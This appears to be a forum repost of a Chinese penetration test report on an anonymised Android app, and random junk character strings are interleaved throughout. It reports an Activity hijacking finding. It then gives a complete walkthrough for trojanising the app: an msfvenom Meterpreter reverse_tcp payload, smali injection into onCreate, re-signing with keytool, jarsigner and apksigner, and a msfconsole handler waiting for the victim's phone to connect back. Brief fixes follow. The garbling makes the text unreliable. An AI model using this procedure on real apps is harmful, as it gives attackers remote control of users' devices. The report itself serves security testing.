' E/ h& K1 L8 ]- u+ u
p! p+ c+ ~- d$ Z5 @ c
9 j4 o4 |) v' F( V9 o( P
; L+ B& v: H9 E. p8 Q% a3 K8 J, Z : [, r$ R6 S" y/ w
9 t$ u+ O# H6 X' O! Q
- U- _4 w8 X' N5 O$ T- F
8 p7 l& y# T+ U0 q . V& x( D3 C' M+ X& e
3 V- X- N; S" K; [% b 2 检测结果 / T) f/ @; K6 y. U4 }
; n- |3 F( N3 O5 Q8 m( n
" p5 z% v& G% s. ^! O- t! b2 W
! u; A' S) u9 a4 J/ L
- u5 J8 L+ W- q% a7 i6 r! f: h& p. D3 C! R4 _5 g
2.1 某某某
. z& E" d: x8 Z/ _% n1 k
0 C8 }2 K+ ~0 c9 p" A
. }" f r( Z+ `$ c4 @. s3 U2 v+ P' O# h6 n: ~! r/ O
: V1 Y7 R) i! N5 {, U, c
6 s# o3 X( M3 V( s' B 2.1.1检测目标
: ]6 t) v a& m( R
) C! l( V* y) c+ W# S6 a- ]
4 T$ J. I, W" m3 C
- }5 ]( I: I, T8 s& [: `3 r
7 W. C. `- \5 v6 }5 G' O# F Y. e- N6 M9 d2 ^. h/ [$ a% C
目标地址: 某某某某某某APP
. A; O- u, s) J- l0 S& V5 N* n- T9 } p" s+ p, j* r
1 Q" x5 O" c/ X% ?! Z5 O" u' B! N& n; X: B5 B
9 X' F) @8 I! |6 i7 y
0 K& o, G$ o8 \+ ~" x7 I8 u" v$ f. Q
2.1.2检测结果 " K7 I4 d r- K8 a7 y
7 r' D% \+ C9 B9 A
1 \* w' |+ p, P
* W& D1 e4 s. E
, W0 M8 l! B- T9 N( P, z( w% Z/ H) \ [# }5 u q" g
2.1.2.1
, {2 o5 z1 I' f3 t( v1 d
. N8 x, U9 D# I# c6 t, M
; W* K. Y4 c3 f
. Y, W2 [9 \& Q( I5 w) A # \9 a9 { f/ A W
) G' p: _; f7 Z" Q9 C* G3 i
漏洞链接地址:某某某某某某APP . I3 H* d9 c F; z* F( x
7 {2 r% G: k) l
& z7 w9 U$ g0 X7 z- J- Q9 T! B H- x1 L* s7 A& q
, [: d9 `, e# q. ^
9 E- O9 g) L7 ~: i/ W 6 K8 w: n; | u4 R
W! s! J& ^% G
. K/ o2 g5 B& ~1 i4 c3 s7 E, E
8 a2 H$ V; S) Z. F) y
! @3 b) Y1 |1 j) J' H+ ] t9 Z7 K; ~9 v6 d/ Y2 {, i
漏洞分析及取证:
* d+ [" D% h `' O! N, I- M' i/ G, E& ~% H; N1 O5 i4 P
; Z" R6 u; Y% z" e
B/ q9 g' R- \# m# t6 y( s
1 ]8 E8 s* }4 J
8 j% a0 p5 J- \" l( B8 q# O, ?& F8 f 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ) w- a8 I* E: ~$ t
! K9 t# e. ?. s, o& q" Q: F: [
5 W; f3 j! R- W2 K4 a
% |( O* d: h) y: v- q
5 f7 I, X! E( n- N& V
" p2 i) X4 g N( L4 d
: S; [! R; V/ c, p6 j8 {# Y3 F7 H0 P! q I1 e. f: [0 F
) o& a( p% V) m! L0 x( `
8 k& q' v0 `/ z( K- k5 P ) ]" u/ V2 v! D* k, Q. e
3 N C+ y/ m& ^2 |- H! b4 l8 u 2 j' P6 ]2 N/ w, n+ G# j8 O, Y
\! {4 T' K J- p% N3 G% O
Q6 j9 l' r8 z+ j+ v4 k4 A; h" U6 ?: l* d) E7 @
8 ~4 Q0 I1 T, B6 \% j0 j/ C1 o" N
6 h4 Y" q0 Y6 w7 P" k 
9 H [% O4 s4 H* j
7 h" G w, K2 D6 m, B( V
0 G$ ~6 T% l4 G
0 I* f1 f3 a1 z + ~" R; m7 t9 \; J; }# Q
7 }# `6 ~; `1 D, M
1 D6 B# @+ J3 g' ^$ H: _$ U! Y
) r+ H4 }3 f7 _3 o
7 O" Z8 z1 N/ e" ` c8 v7 K
8 S, P6 \! B+ K9 ^
d/ A! v/ e6 S, Q {% S1 }7 [) S: k x$ L* b
' z* ^1 E5 L# ~' L
3 C: X+ H/ o/ \; D p
/ ~& k- f4 k" s3 N
$ i+ J3 }, N' y7 p+ O 9 ]1 u# u, z( k( M8 j# W
6 D/ H4 K" g; }9 E/ ^+ l
漏洞危害:高 3 w+ W; W2 T ?8 L' U3 S I: j& y
& p( _. h8 P, f/ |
: U& F/ S/ \6 ? G4 Y
! Q; k1 b' H" c4 O' S9 K# W
* Q9 ^' |& i2 A# W
' r1 \! k0 [- V % P7 @3 ^/ k) d" ^/ _
, y4 m$ ~1 K0 s* j! G/ x# m+ M+ T
4 \2 D$ ]# n/ v7 C: i
: P2 L# W' i1 W: D, m6 r2 {2 g
+ g$ H) u1 @+ C1 E
# [$ p4 p, O ]+ _' A6 F: M |
& `# ~6 W X. |( t/ V, d: t
6 L8 |2 g: J8 F; F& P2 R+ l$ P 8 P1 C+ X# U5 c4 x
% Z3 }2 Y" X- _% z 严重程度
. N8 ]3 x, a7 G6 t1 P w% b/ |+ _
3 i& G) M$ ?. J6 V8 m! y) `# v& R
* w% ?3 T0 P5 @' ~5 s! W
$ P1 Z* v/ t2 N9 W, S5 b& P | 7 R- ?1 L9 L& h( x* `! H" L
1 h* H6 n# \. }6 Y# ]* @
. o# a8 Z! l6 b2 Z
* _' I: E' |5 n8 u- j5 h2 h
4 M, _* D) `2 |% U# J
1 l l. I; l( q6 r9 p& E 高
+ q& {' P4 K. v4 j& Z8 f2 p; H, Q$ r. e4 i2 X
7 d$ J' U5 u4 f- y: e
- g8 s; r. X+ @0 O | * c& R' m3 n1 \4 \ I; v Z- m
9 \, |+ z A( j' ?. O# }. D0 a! z" I
% @8 c/ R4 R3 o `( s: G- ?
7 o' S6 a8 U( g5 q
1 i( r( R5 C% t( c+ u/ ~
' P+ o, _" a; o. Z2 m! L, ^ ■
) ^5 W( @! s! T( D% |( o* g/ E \# X. A
1 r. ^0 A3 G, @% \ % {# c- D0 `' }3 ?$ U& `
1 G( l) I6 b9 \1 I) @8 A3 e | , U( r2 h4 f+ w+ ^" T7 [( Y" D1 i$ i
0 G) |* a3 ]$ [/ s$ T- ~ 0 x5 d3 M# ^0 R7 S. Y* C" l
% G" M( K; [1 G1 @
5 ~" x- v+ C6 k
' K2 h/ n i! x* m 中 , H4 I1 h9 c. k) G5 f1 N
3 a' m+ x! L7 h b" ?2 Z
& l$ x5 }; z6 M) R: Q
! I( A* T8 n# o/ ~1 a O$ s, C |
: w6 i, ] k7 z# u/ n1 D6 ?! G9 P$ \) X! N, k0 b; O6 L2 }/ s, @
# w; E+ p! ]2 i
- e2 g7 `9 G! `. j& `
7 ?+ L; U/ r$ e$ E& a/ c7 P
# K5 B. e* C0 s6 D2 M) P+ _
! @; ~: V a# C; e0 N3 ]% k2 n1 M
2 H( Z0 V: T% i) q! X- w
8 l( ` Y# @* d- q# W | : S1 w) Y: h1 `+ G Z
+ }0 g" m/ Q, }5 x- Y, X" V5 ^
8 V$ D( {* Y- i7 l, H4 u# u3 G. @+ Q3 R; d% F$ Z6 C
9 D9 l! U( j3 y2 e5 S
2 U( e/ {; `% ~! W) x
低
/ i- C e G' P: Z# K- }6 l+ z, r( {) ]/ q/ \& {
( {# \& z" }9 H$ g5 |: m* s( m
7 ~; S4 t+ F9 t+ u( n3 a, o: C |
1 ?4 r; _% ` E3 A+ `
5 \0 a u6 c0 D% R
& U$ ]) Y7 `0 [6 s; t( Z( ^7 Q. _0 B* ^& s9 y5 k1 C
8 U5 d& i0 @+ o1 K" d* Y
y; K9 R* {2 H' @1 j4 o5 E Q
q/ f( [" |* @6 u% ]" w0 ]$ t i0 T0 B) `
& y6 _1 Z Z% f! h
7 B: e: r9 N' K+ N) r9 P4 v | ) u2 s5 K; o- V: h6 Q7 F* I
" a8 T' M4 P; c9 R# Z
0 h. [" i* c. v- ]
4 @( }' [+ O3 K- O- M2 O
! ~6 ~+ Y! K* n; R; f* c) m
- V* l r% m1 p# O4 X( O5 C
p/ E- _! E5 o# j' ? v2 i) ~% P
. I* P" a3 Y2 K8 b
0 Y8 X% L) c9 E4 m! I1 z 7 [5 R; j. w9 Y4 [$ M) O3 m
& k+ l/ d2 ?& G- u" J
9 S1 z2 ?: h1 m% ]! C" Z. _6 p& y* W/ p% [* p6 y
) r) H m, T7 p) ]' u9 e6 d: X( I& {: f
& @+ D3 p6 N( [1 W) w; L
( D4 l- G# l- v) R! i 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 + N# \. j$ k8 Y6 ~3 L
# e2 k, f' J- P
. V5 M0 K. C6 \" H4 F* N$ d
/ ~+ B. K! d, C8 R
- ^5 {3 X- p. B7 @( ^3 B4 V
" N5 d. z3 b! u
2 u8 e) [5 ^8 y
: h3 ]) k/ |+ _& ~8 X8 C
# d& y. l2 z. F6 q. z" {# Q. O* Q3 P, E7 H
2 k( l- W- w9 ?, j
1 K- g# v' r' p- [* I) F9 V( L! l
( j s/ M& }- ]8 p2 ?
& p, n$ z% |4 J
) ?1 k$ P5 @! W: e2 O
' R6 B+ z/ ~; t, L" F3 J
+ p2 S1 K. n* u
0 S* }( P* @$ I: U+ u 2.1.2.2
4 L& J+ p3 ?6 m
2 w6 V9 \' d& M4 o6 `2 n
. m- B9 j, J% M. s0 Z
1 V0 l4 J0 c) `8 T% @, m6 h/ ?
; l. _$ q2 ~) L! X& s2 D9 L
m8 x( m1 W" v) S* x/ @
漏洞链接地址:某某某某某某APP 4 O: H* u7 x0 c/ O, Y3 R
; F/ z2 V3 y: u' z$ M2 p) E( F" u
9 ?/ t# u; q |. x& A2 q
2 R/ L3 R7 C9 E/ k
, h( `/ l' |4 V
6 Y) o. a' p9 s2 z5 n1 d( B* C
漏洞分析及取证:
: W+ ^3 H J: O1 s6 S$ d6 S
3 b+ R; V; x$ ]- R- [7 X
; |- }7 S. d; ~
: O) F/ ~ d/ [ % [( h/ j6 O2 d. |3 j
; l7 \5 q; n8 @' C. p& Y0 b 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 4 [) A8 @- F! `" y* l) C- _( O' m
( _9 A! C8 Z+ {3 c- I
9 k8 Y( p' p, z" e
1 k& M( y& j' d; K1 F2 n0 d : i- l# J i: z2 W( w; w. H1 u4 ^+ F
7 D5 s5 \' Q. R! G4 ~
用Metasploit 生成木马 apk
: f2 [* O4 _) E( G& S" [" L0 C0 Y4 ~8 t
3 A T | r6 J7 O6 o2 ^
8 W9 c' G9 G, d7 ^6 ?
5 R' H0 L9 I' M* L6 G: N" ?
+ m' Y A+ {/ B. @4 `0 O+ y msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
' S6 B; r! l1 h* s) B4 }) R( p# A1 t' V& l3 j( p3 X
% `1 B! V( ~/ z1 x3 f$ _0 E, D9 P9 k' W. e* {7 Z7 ~4 S9 V5 a" y* y
8 z& I6 d# ~: V) r( T J) o$ Z/ F. o) _' q, Z n. L2 X
反编译目标apk和木马apk
. \) e# V$ u- _0 ?! \$ Z) t8 g0 O- H) d6 T/ o( g' W5 O* o
* G; O: F+ {6 J! R
6 p. c6 @. B6 Y% }; \* H: x
' Y& s! w% c# I( r
8 y; ~3 }1 T9 y apktool d target.apk
7 D1 M4 A' b" j6 K. [3 d4 ]0 _* u
3 p- r) c W# C- h8 ~* p: U8 L apktool d cockhorse.apk
; }; t9 u4 L1 r# [6 {
- k" _, y7 [) L- d% v
7 @+ B6 z0 u q7 I$ L# f0 m
& e; E0 P$ P* c5 V' ^- @ k
# V0 V! A$ A! H, n5 ? h& ^
0 z: A5 d* X5 Q 木马 apk 注入目标 apk
# n6 u+ O6 C" `* b( |
; Q4 i0 Z6 l) C! ~3 ~+ l
4 y$ {5 s+ s, W8 d) E( `3 | L% q5 z# a4 z8 ]
; G1 G* ?' J, [; Y u. f/ _" p
% j) F8 L0 V$ }* ], K
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
n* r* L3 k0 f X6 O( y
/ U N5 J }! J5 z
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 1 g7 r* O4 `( X+ l: s; O
& A6 T, {8 ?+ Z( c- b0 O) P
) S. _- M! I* ?( I' M, L3 u) ?0 V) m' q2 M& ?
6 k3 f4 D6 V! A# m6 N. |' D
% U- j. ~7 A2 D8 M g3 g! Z# ?
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
+ U' S N+ @" Q, p: ?
3 J% `1 ~ _9 U
8 J7 N) I* ~0 F6 ~/ Q! k% [1 S# r
& @) A) I3 m/ q; T8 ]' A' {$ ~1 t7 T
: T' X' Y5 _/ U: z8 L$ r1 p3 d" I: i1 m; n& `- {8 z; F2 X
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 6 {1 }+ O5 g4 V: t$ q4 c" c7 W
5 \" _( X2 X% K0 w
( D' b. C. B, E; P2 a H6 U
$ n! a# ~& Q; m5 ~
8 U& l( u2 W# {( R( t$ [
% M* Q! T$ ]: X" Y, H- ]" B 回编译生成最终 apk & K" z/ L1 j/ h/ ?7 H* g! B, O
% B% K- i) P. a9 ?" l/ T
$ j$ S9 Y4 P4 v ^8 p1 o
+ h% q, ~. c7 E3 D2 d; Y 9 G- ~# ~ ]& ^; X: B) W' k. V
. }) w7 Z8 y) m# f4 Y0 h: C$ U
重新打包 + Y4 j7 t- z3 E9 s/ e
) V0 E& b+ R+ T1 L# E
# ?# R9 v8 A3 r* _ D
3 x2 l, B7 u, e1 t# _
- v' B0 X: K( |. Q( B! Y4 |' r( t& w3 W
apktool b -o repackage.apk target_app_floder
( `) r) ]! O4 ?, n1 ]- E2 g* B2 Q3 r
) k3 A d/ i4 K) r. @6 Q
6 s( z. _! Y$ Y. V. w8 `/ L
: ^: h$ C7 X( T8 ^" y7 I4 O
# H7 }. r" a5 Q* f, W" o% Y0 D/ g! v1 P& c d( K
创建签名文件,有的话可忽略此步骤 + L1 B. y( [( D
$ A) ], F. q: o* i7 X
, w3 i1 e' @& R2 j$ D! u
' x8 z& b* S$ }: G8 x6 q% [
7 h4 d6 a3 ?4 [( d. H6 I8 C' |/ ?- z3 L; L6 U1 s, f% N
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
+ v+ m$ K4 a8 N5 ^0 ?, ^
" Z: l( Q4 s. L+ _% M
$ I) A3 R$ u4 c2 l! k% ]: \
# [1 E! M8 i4 I0 j& w/ E1 X9 G& S
7 B/ {" G3 K" h( }0 j( f7 c. @ o" G! W; F- t* [) v
签名,以下任选其一 - p) J& R& ?# j) T' s! \: [' Q6 d
" V; g0 O3 }* x/ _
1 G) T1 `, L/ q& C% s4 j
/ U4 D. m0 l; w. ~# W B% t
! p6 z# @" ]& N- m A) A5 I
, V, }4 E1 R7 {: G( s- N$ Y9 Q
jarsigner 方式
1 o* Y' A# O2 J# A) G! {( W9 h: H* G- T4 E" L8 A% V( A4 l
6 ^! q3 y' I; w e& x: u3 g4 n$ W/ U q
9 Q0 r# y4 y, R3 s- Z+ ~6 t7 n
) N- C0 s& L6 \, Z; w' x7 E jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 5 D" u9 C6 x2 r* p
c0 M, a, Q; c, t4 F# m1 h
9 E- r2 u# M* j
. K9 B. L$ D* y
5 Y F+ U) U+ h* j8 u7 L, U( g( x3 ?8 c! m) R
apksigner 方式
- K& p% w8 Q2 w7 ~, b9 o8 i
5 F% E# a7 N+ d7 o- o
4 H1 N' l* M8 K: O" {% F
7 a* D4 i5 N* T5 @4 ^. K0 [- R+ X* e
1 n; r8 Z2 {+ l
+ G, F0 `& P/ j& P- I+ A apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
" |' z0 q. O; @" o- ^; c5 c
0 w$ [! I4 ^; i5 o/ W: ], ?$ S* R
9 A+ b& g# N. V, }
' s* c7 T: v" o5 \& A+ u5 H& |
% |; J8 N: x, |. q0 a5 G, K1 a6 O0 w: L" T# w4 _
如需要禁用 v2签名 添加选项--v2-signing-enabled false
7 F" t9 J3 A8 {7 ~5 j- m6 V- F/ _+ B. |2 Y3 t% d) I/ h
+ F3 m: l9 y! }& u: ~4 k* U, `6 K) {. i$ Q
" @0 \2 p- z! f! s
# h: [1 ^- O7 J/ ?7 a, \9 h 验证,以下任选其一 . \3 j$ Z& Q$ S, A6 \4 e1 s
& ~! ?# v; |, Q! @. X* {3 J) g" c; t
0 ~1 c' |/ Z9 L# |% @% O
% d' y8 H( t- h- {- w) k9 U
; J7 l& _5 i8 n p6 D+ G; }8 I: F' C# M5 j
jarsigner方式
7 r: R+ N4 H% f4 ?" W
3 E2 X; d: P$ F7 a( x( H
3 g0 O2 I- q! ~) M" e
9 Z0 j* p* {% I$ G0 ^1 c # z: F, z. n' ]( T
- ^) q) ] _1 Z/ w jarsigner -verify repackaged.apk ; S0 _2 x0 r) D! N% @9 ^$ H7 w
! Z! G) N4 [# h) b$ Q/ F8 ]
+ v$ c2 J7 t$ r4 D7 x
$ `# M9 R {6 [' Y7 j$ i% P
+ l1 z" a" G/ p+ [" F" @ J2 G5 Z& m1 V- |8 R) Q
apksigner 方式
6 d' r) x5 ^- @$ u+ A: V7 d, g' b9 }3 ~- n% G9 `- e
* v' i7 c% I% H% P2 A/ g0 o0 V& K4 G6 N# R: [5 X7 P
& ~! a1 t! T0 X: g! e8 ^+ C: F
& @5 ]6 M; A* i% r- E( b' r' L apksigner verify -v --print-certs repackaged.apk
q. E& n" d: r; L( z
$ S: V: R0 \" P2 X; c; K6 y6 e
. i- y: ~( V, T4 U4 z2 X
' K/ s7 d* G5 I' h' w6 X
: q+ Q; r9 r( ?6 F& T8 G: m2 w- e/ b8 a5 T/ S" Q
keytool方式
, {1 j6 w: |1 T: o
: ^4 F- O; t2 }9 u0 B' X
8 e/ g; ]2 ~5 r6 P) \
( B. H# `+ ~8 F- I2 U3 [5 h! J
( b6 i6 f+ a6 T
* M) m w* @) m# o keytool -printcert -jarfile repackaged.apk
( \9 U5 i! G7 w* i: s& m8 d$ r) }
: @6 R8 h) b8 K/ d5 S( y) E
1 L! V! Q$ z7 T9 d
4 K5 d4 G. v8 \( o + a+ H/ c& h+ g, b- d$ O
" e/ u7 r! k! I* f
对齐 " h$ D. e6 ] B, y' n0 d6 _
; l; M! V! u9 P9 S: Z; n
" @3 E7 W2 e1 l1 b
% `% ?" o7 I+ x' i3 B' |
* {1 F' _0 }# @) l$ i8 u
( e$ d2 Z" ?$ J ^2 W 字节对齐优化
! ^" h+ B; h# X0 g/ \+ t
. [6 u1 } v; b8 A/ y* D0 m
& Y2 K0 _2 D! g( w9 q& [
6 K! ?9 Q7 y" i Z1 p" C; U e / u% T+ z; G9 ?/ O! N$ V3 c
; {0 g2 ]0 x0 M zipalign -v 4 repackaged.apk final.apk
# H" t4 B; n5 I/ I7 F& h5 s& o. d6 z
$ [2 N/ [8 e: w' C4 e) T: q
! P& `$ W) ^% R# [* d7 `/ ?( |
! N% a6 s. g4 n1 ~) ]5 k, x. k3 A7 w# @9 N9 o2 y9 |1 k0 s* T7 ]
检查是否对齐 4 f' I& [! u8 V, B
! w& N: F" Z2 z
- T8 `! U& h; `0 i4 d$ p- e
2 O0 S2 b; U0 h/ d% E2 D; [7 J0 w 6 R `5 {) H/ o$ ?
& \+ U: N7 {( C0 ]) F* E6 O zipalign -c -v 4 final.apk
- f/ i( d }$ u& w5 O q F& L; a2 D, P
, |2 V) T0 w/ u
/ p* g1 T) U( w. |/ c
: M4 l/ _9 F3 _! ]# F" N& c8 P. }
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
, q: B& X4 \) U" Q8 x7 V6 o2 O, f- H" H# a+ }% ^% O
6 {* }- T" ?$ X" J8 F3 e# o7 S
% r2 r. y w! B( }; c1 Y* z
. f/ m) @/ Z' F$ c! c+ ^2 G; f; p7 X
启动Metasploit控制台,配置参数等待上线
/ E, L* O+ ]9 z+ w6 A- T4 h D- h4 C. P- s& t5 y7 b
# I. S: x p6 W4 P+ h7 K
# {/ n) E8 F0 f$ _3 X S1 d 8 G0 G4 A( k0 f$ A N( y7 C L
3 b, a+ w+ q$ U/ V8 i0 s
在终端依次输入如下命令
/ z! g* }3 H& U; p& B! U; s Y7 I" u6 Q! Z: O, j, h3 ?4 C
2 m. t4 b# v; W9 o
8 k; r0 `( _0 u; d/ f % Y9 H; f- T+ u% R
" W7 l k$ E+ T! I5 x" E. @2 `
msfconsole
" u, y C1 g. [. i) a1 c! g; x B' B! B' V# t1 i) d. X+ u! B O
* X6 ~: }! B6 v) o) }
6 w" Q F( d! w0 I9 R 2 y/ X6 J( e' g, i* f
' H) n6 W2 E% n% ? use exploit/multi/handler " m# d: e+ y4 z# X) ^" ?, j1 d
6 w% ?& }/ m# H+ v5 m; S) j
. J/ W$ {* R4 t' @
8 m9 j+ i! J' I
" A0 Y7 E9 U" I4 P5 z
7 B2 o- C, Y' M) x% W
set PAYLOAD android/meterpreter/reverse_tcp 1 @ u+ C6 u+ x7 M7 s5 W: k# t0 O
" ` S3 F( M; u6 @9 R3 u
3 Z4 h! _- |; j
1 o) y# q# f$ w) L
$ G# n- s1 X# X% |& K5 N+ h s* o" H/ p1 r2 S$ R7 G
set LHOST 192.xxx.xx.xx
/ b. N% y+ j0 J1 R3 k& ?, I0 d/ q3 q6 E8 V w* ?6 B
0 m3 y( f3 _) M7 S7 d: Y# B+ e/ T! R0 Y. x. N, G2 h
1 b3 X0 E% ~) }$ K5 W! I! C& d3 ~4 I) o( c" D2 t
set LPORT 4444 , n, e+ j& f, M
. s" ?! S# D6 M) [* D* a( {8 I
9 }4 t7 _5 e# M0 M5 V3 N1 l6 I6 K/ z- V5 P& o8 V- |' _$ p
* z0 {+ N. h# i3 }: @9 T8 H% P, b# }, e5 v4 H j
exploit 2 }5 b1 e1 m1 `, G" g) A! w6 g
$ t q& h! S. s* T% h
1 v9 h. A' w. }. i5 A
3 L2 _( c3 c) q# k2 B
% S3 A8 S: f ]1 X# |: o# r' x
1 d2 c8 _1 H) w, _! O. K, U! Y& u# W
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
i, u5 h) ?2 ?$ S# J# J( e
( J0 D" v* h* A% m ^ a
\* j+ g9 }; F- f1 C
3 j8 n" N* t5 a/ U$ z* Q
3 U5 @$ d$ ~# n4 X
1 X; s: c: U0 h e { 漏洞危害:中
" `3 A5 l* F5 q5 |7 m$ n7 [# w
+ R1 y0 U j) D! L9 b. T2 x$ N
7 J4 b4 K, y& f; O7 y
# l8 I3 V. [3 A2 j* e' E 7 j o7 B+ [* l+ Z* Z7 l! a
- e- `; U4 P0 G, y$ _1 ] y
. G7 T4 |9 T4 D3 K( b
. z @' T) b; H4 S+ L$ H" J * D2 {4 H& o9 X8 V7 F2 f; P* r
+ h+ B. u1 Z* a: k6 _/ |+ n
! A8 D5 g J1 v) n& J1 p9 f* R3 Z
' s0 f# k; v7 z/ C $ [( ~5 q0 f9 \8 b1 q2 Q" @
: ~/ K; v$ P- s, y2 V8 P4 y) } |
% B3 t( x' J; i* E6 K, l% j' l+ o1 w# g6 G
, e+ v2 C; ~: r. Q
2 v% J; G* b0 C3 l, Q( [ 严重程度 ; t8 g) h1 G1 y3 o
( L# V3 ~/ {0 j+ X+ ?% j: X$ l" v
' M% d$ W) r, P- R4 [. `
& m3 q# f; L5 Y% U) S | + c- @6 Q" E$ o& _# g9 H) Y3 X
& x+ P! k+ L: S% Q
0 M/ r7 @/ n$ q! h7 g$ }
+ \& ^! J4 y- P; F 8 l1 |( g7 t m
; L) m' k' a- p$ D! ~4 R: i0 x, Y3 ?
高
/ J4 Y1 E8 t) r; w% {4 ~5 s, U$ ^" n
' ~2 ~9 G+ [9 W* ~3 e) }
4 S. @( s( N3 p* `' p/ H5 Z | + n+ B$ [8 P0 c) N- c
8 N% u2 G+ l" t9 v( S% S. R
2 `* s- W& E4 t/ G* F. O3 W
/ u& @. k! w. u6 n/ q2 r " h& N4 B7 f' C. ~& _ n; B$ _
9 @6 I# U) @ i- W0 _
■ $ I8 A" O3 {7 N1 g, m! W
1 E$ _2 W, k' W 9 L0 ?" t1 ^$ h# I' x2 R! M$ f$ ]' k
) R: Q) a) }0 p7 | | , ^# Q( `; p0 X- v7 y# X
) q+ L$ G0 G# q+ y q" l4 ~4 E, H
3 w4 n) |' n5 l+ x9 P
, x' V7 B' A; P; c* | K. G
4 t" K: g+ i: g' h6 r6 X( U
+ K- ?7 Z% b0 L; y 中 8 w6 A1 T$ _; j/ h" x- p5 m
# } w) X3 ?2 F5 ], N
, J/ W: q* N) F7 D! a
$ \2 y% d) ^* @& x" C9 s
|
( r/ u* j% L5 E, f7 b! @9 K
4 M& u" e- x$ r* @3 q
4 r, j+ |- q* q& u$ `2 R, R( D/ {5 n5 J
% n" b- a/ d; D6 l- G
- q' F+ s3 ^9 T5 Q / m# ^8 o0 U7 O# ~# j$ K+ J4 E' X
7 u/ d6 C! W* l
3 ?9 o7 c Z: b0 {) J8 z$ S+ j4 J
7 f$ p2 O! ?5 G5 f7 Z
7 c5 x& m3 O/ t: j! v6 N* }
# D+ |) `4 y% m, s* a+ Z | 8 A) z& e9 l7 J
2 y; |* j+ V- x, l) O/ v o" i; F+ X2 M* N2 b9 n
; O5 v1 T/ C6 w" d6 v7 l
4 n$ @3 J V2 x+ V6 f/ N4 s
; L; Z% M! \! G7 k8 @+ ]
低
3 K+ ]- [* | w/ E" _7 j# I" f/ ^. _2 _% O* N( R4 C2 q
1 R; |7 F" Q T' X( p
, y ~( j: J0 ]" Y( J
|
$ U' C# L" j3 U* Z, e
# q) l6 M" r: K" \3 f 5 C1 s3 n' w4 Y8 B& w5 |- w
, h) Y/ I9 Q4 g* O& n9 V
4 {& V* d) F. p3 U2 D9 y$ F( U* C2 A( F9 X( ?/ d
& C5 {; L! V- Y0 E7 G- |4 R3 V2 k, F: v% h! r
8 z: j# |: n. p$ Q4 G- V8 g$ r4 Q) q* F" s' k+ K8 u! J& x
" |: X9 f* ]0 Z
' L+ x- {& l2 D _ | % O6 ^( @" C$ H- M p
7 e/ z @7 C% x7 ~3 F0 k
5 ~* i1 ^) ~ z u
" p' F0 m9 F. B3 ~) \
7 g" K/ Y" Q G( x4 \& t; f. v3 ^, P+ f* X% A
. p$ N2 }, V9 b# X
2 ^, U( \. n9 K* h X% L- @; Q) G
( c0 Q/ y G P2 t5 Z O1 f, u
+ Y5 Q$ |& s& f# _3 Q/ v- h
) N$ k: e& g& K& M8 l4 _# b
( h8 K( ~* y( ~8 T 8 C% u, i7 ^( y4 f) \
3 L6 t9 R, o( K% |
; H& O$ G" s& Y' }; w- U5 N( S+ M R6 S% ~) s8 r1 f# A
; k( e! @; V d5 Z. q* F& v4 _' } Y9 @6 Q+ n5 P
修复方法: - f( O6 R0 L# [$ O7 F2 i& ^
0 b7 L2 o- {" F$ C2 D8 a, n- @
E$ I8 o) O* \: ^
1 u' s7 f% u! ~
% M+ e. J" K/ T& f6 P. W+ W) J; ~5 \5 E9 W! `
1.在 APP 启动时应做签名校验防止二次打包。
) U/ A9 D8 c& e4 c- m
& V0 E7 r0 |# n: G/ U
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
2 [1 Z1 f5 Q: r( ~; E
. _5 o# f' v+ S
; J2 m* k( |* n( O7 [( d
9 N" C1 K* \0 }0 M: z- Z
% i% U; B5 G5 Y) V3 v/ `/ c8 w" v6 ?9 k9 ]3 s5 s
. ~. z3 Q5 X3 v' H8 e3 Z2 S, g+ e$ }$ ~/ b; N3 i
: ]5 r( X7 C, ~5 B4 o( N8 Z5 n7 Z2 b
% c% g) z+ f& W3 ~2 \
5 G, Y6 X4 S4 R; x4 a; Q9 j
$ B! b O# S' J/ `& |2 `4 [) `+ j* ~ |/ I9 W 0 U( R+ ] ~8 @/ q
- z% Z4 L0 `! W$ Y1 n8 k4 J. p8 _
+ ?: E! g0 y3 E
/ t) L1 d& y6 U
% f1 J2 w( }, g6 O% ?
. W: X5 W- n) ~1 F& c
6 g& E. D4 ], S. Y9 l7 A3 Q$ }9 W" ~
9 l3 ]: Y* p" H" a 
发表于 2022-6-8 20:32:44